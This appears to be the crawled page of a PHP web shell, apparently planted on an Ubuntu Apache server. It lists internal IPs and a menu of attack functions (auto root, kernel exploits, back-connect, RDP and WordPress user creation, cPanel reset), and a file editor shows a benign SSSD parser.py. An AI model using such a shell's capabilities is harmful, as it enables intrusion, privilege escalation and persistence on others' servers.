Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
sssd /
[ HOME SHELL ]
Name
Size
Permission
Action
modules
[ DIR ]
drwxr-xr-x
__init__.py
0
B
-rw-r--r--
parser.py
1.87
KB
-rw-r--r--
source_files.py
2.25
KB
-rw-r--r--
source_journald.py
1.3
KB
-rw-r--r--
source_reader.py
508
B
-rw-r--r--
sss_analyze.py
3.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : parser.py
import argparse # Based on patch from https://bugs.python.org/issue9341 class SubparsersAction(argparse._SubParsersAction): """ Provide a subparser action that can create subparsers with ability of grouping arguments. It is based on the patch from: - https://bugs.python.org/issue9341 """ class _PseudoGroup(argparse.Action): def __init__(self, container, title): super().__init__(option_strings=[], dest=title) self.container = container self._choices_actions = [] def add_parser(self, name, **kwargs): # add the parser to the main Action, but move the pseudo action # in the group's own list parser = self.container.add_parser(name, **kwargs) choice_action = self.container._choices_actions.pop() self._choices_actions.append(choice_action) return parser def _get_subactions(self): return self._choices_actions def add_parser_group(self, title): # the formatter can handle recursive subgroups grp = SubparsersAction._PseudoGroup(self, title) self._choices_actions.append(grp) return grp def add_parser_group(self, title): """ Add new parser group. :param title: Title. :type title: str :return: Parser group that can have additional parsers attached. :rtype: ``argparse.Action`` extended with ``add_parser`` method """ grp = self._PseudoGroup(self, title) self._choices_actions.append(grp) return grp class Option: """ Group option attributes for command/subcommand options """ def __init__(self, name, help_msg, opt_type, short_opt=None): self.name = name self.short_opt = short_opt self.help_msg = help_msg self.opt_type = opt_type
Close